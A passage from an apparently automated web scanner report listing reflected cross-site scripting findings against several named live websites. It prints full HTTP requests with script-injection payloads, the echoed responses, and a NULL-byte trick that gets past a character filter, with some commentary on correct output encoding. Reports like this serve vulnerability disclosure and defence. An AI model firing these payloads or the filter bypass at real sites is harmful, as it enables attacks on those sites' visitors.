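    bad = render_vulnerable(PAYLOAD, '1')
    good = render_safe(PAYLOAD, '1')
    print(bad)
    print('vulnerable: key ends at %r, then code %r' % (first_key(bad), code_after_first_key(bad)))
    print(good)
    print('safe: key is the full payload: %s' % (first_key(good) == PAYLOAD))
```

The same backslash that makes the encoded version safe here is the wrong tool in an HTML attribute (see 4.33 below, where the application inserted `\"` and the attack still worked): the encoder has to match the context the data is written into, not the language the developer happens to think in.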

4.24. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [btid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R8lWflQ0f_326769041.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62043"><script>alert(1)</script>6de2e5bdc2d was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F862043"><script>alert(1)</script>6de2e5bdc2d&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 20:50:58 GMT
Server: w55c.net
Cache-Control: no-cache, no-store
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Mon, 04-Feb-13 21:49:14 GMT
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 06 Jan 2011 16:51:47 GMT
Age: 3496
pragma: no-cache
Via: 1.1 mdw061004 (MII-APC/1.6)
Content-Length: 3451

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr13.sldc.dataxu.net/x/bcs0?btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F862043"><script>alert(1)</script>6de2e5bdc2d&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw" />
...[SNIP]...

4.25. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [ei parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R8lWflQ0f_326769041.html

Issue detail

The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19116"><script>alert(1)</script>eb6398a7c was submitted in the ei parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK19116"><script>alert(1)</script>eb6398a7c&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:30:40 GMT
Server: w55c.net
Cache-Control: no-cache, no-store
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Thu, 06 Jan 2011 16:51:47 GMT
Age: 1116
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Mon, 04-Feb-13 21:49:16 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Nncoection: close
pragma: no-cache
Via: 1.1 mdw061003 (MII-APC/1.6)
Content-Length: 3449

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr13.sldc.dataxu.net/x/bcs0?btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK19116"><script>alert(1)</script>eb6398a7c&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw" />
...[SNIP]...

4.26. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [rtbhost parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R8lWflQ0f_326769041.html

Issue detail

The value of the rtbhost request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4721"><script>alert(1)</script>30dfad95144 was submitted in the rtbhost parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.netd4721"><script>alert(1)</script>30dfad95144&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:30:40 GMT
Server: w55c.net
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Mon, 04-Feb-13 21:49:12 GMT
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 06 Jan 2011 16:51:47 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 1112
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061004 (MII-APC/1.6)
Content-Length: 3451

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr13.sldc.dataxu.netd4721"><script>alert(1)</script>30dfad95144/x/bcs0?btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8
...[SNIP]...

4.27. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [wp_exchange parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R8lWflQ0f_326769041.html

Issue detail

The value of the wp_exchange request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8c2"><script>alert(1)</script>adc13858a3b was submitted in the wp_exchange parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw8a8c2"><script>alert(1)</script>adc13858a3b&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 20:50:58 GMT
Server: w55c.net
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Mon, 04-Feb-13 21:49:18 GMT
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 06 Jan 2011 16:51:47 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 3500
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061004 (MII-APC/1.6)
Content-Length: 3451

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr13.sldc.dataxu.net/x/bcs0?btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzIt
...[SNIP]...
0NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw8a8c2"><script>alert(1)</script>adc13858a3b" />
...[SNIP]...

4.28. http://connect.in.com/kochupusthakam/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://connect.in.com
Path:   /kochupusthakam/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37075"><a>62ad8f466de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /kochupusthakam37075"><a>62ad8f466de/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html HTTP/1.1
Host: connect.in.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix)
Pragma: no-cache
nnCoection: close
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 05 Feb 2011 21:51:08 GMT
Date: Sat, 05 Feb 2011 21:51:08 GMT
Content-Length: 27769
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<meta name="description" content="Kochupusthakam37075"><a>62ad8f466de: MALAYALAM KAMBI KATHAKAL, KOCHU PUSTHAKAM. kambi kathakal kochupusthakam kambi kathakal kochupusthakam kambi kathakal kochupusthakam malayalam sex stories. MALAYALAM MASALA STORIES, MASALA VIDEOS. NI
...[SNIP]...

4.29. http://connect.in.com/kochupusthakam/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://connect.in.com
Path:   /kochupusthakam/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 76add<a>35d4dfe19df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /kochupusthakam76add<a>35d4dfe19df/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html HTTP/1.1
Host: connect.in.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix)
Pragma: no-cache
nnCoection: close
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 05 Feb 2011 21:51:15 GMT
Date: Sat, 05 Feb 2011 21:51:15 GMT
Content-Length: 27761
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/kochupusthakam76adda35d4dfe19df/profile.html">Kochupusthakam76add<a>35d4dfe19df</a>
...[SNIP]...

4.30. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %006e9cc<a>d0254a6f966 was submitted in the REST URL parameter 1. This input was echoed as 6e9cc<a>d0254a6f966 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%006e9cc<a>d0254a6f966/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 16:04:53 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>d0254a6f966/">weblog%006e9cc<a>d0254a6f966</a>
...[SNIP]...

4.31. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005d974"><script>alert(1)</script>c01828428ea was submitted in the REST URL parameter 1. This input was echoed as 5d974"><script>alert(1)</script>c01828428ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%005d974"><script>alert(1)</script>c01828428ea/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 16:04:52 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%005d974"><script>alert(1)</script>c01828428ea/2006/">
...[SNIP]...

4.32. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 39526<a>384b191b99b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/base39526<a>384b191b99b/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 16:04:58 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sun, 06 Feb 2011 16:04:58 GMT
Last-Modified: Sun, 06 Feb 2011 16:04:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/base39526<a>384b191b99b/</h1>
...[SNIP]...

4.33. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af36"><script>alert(1)</script>770fc1d9d40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af36\"><script>alert(1)</script>770fc1d9d40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the application did escape the double quote, but with a backslash, which is the JavaScript (or SQL) convention: an HTML parser gives the backslash no meaning, so the attribute value still terminates at the injected quote and the script element is created. The correct encoding for this context is the HTML entity &quot;.

Request

GET /weblog/2006/03/base/?8af36"><script>alert(1)</script>770fc1d9d40=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:04:48 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Sun, 06 Feb 2011 16:04:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 176151

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
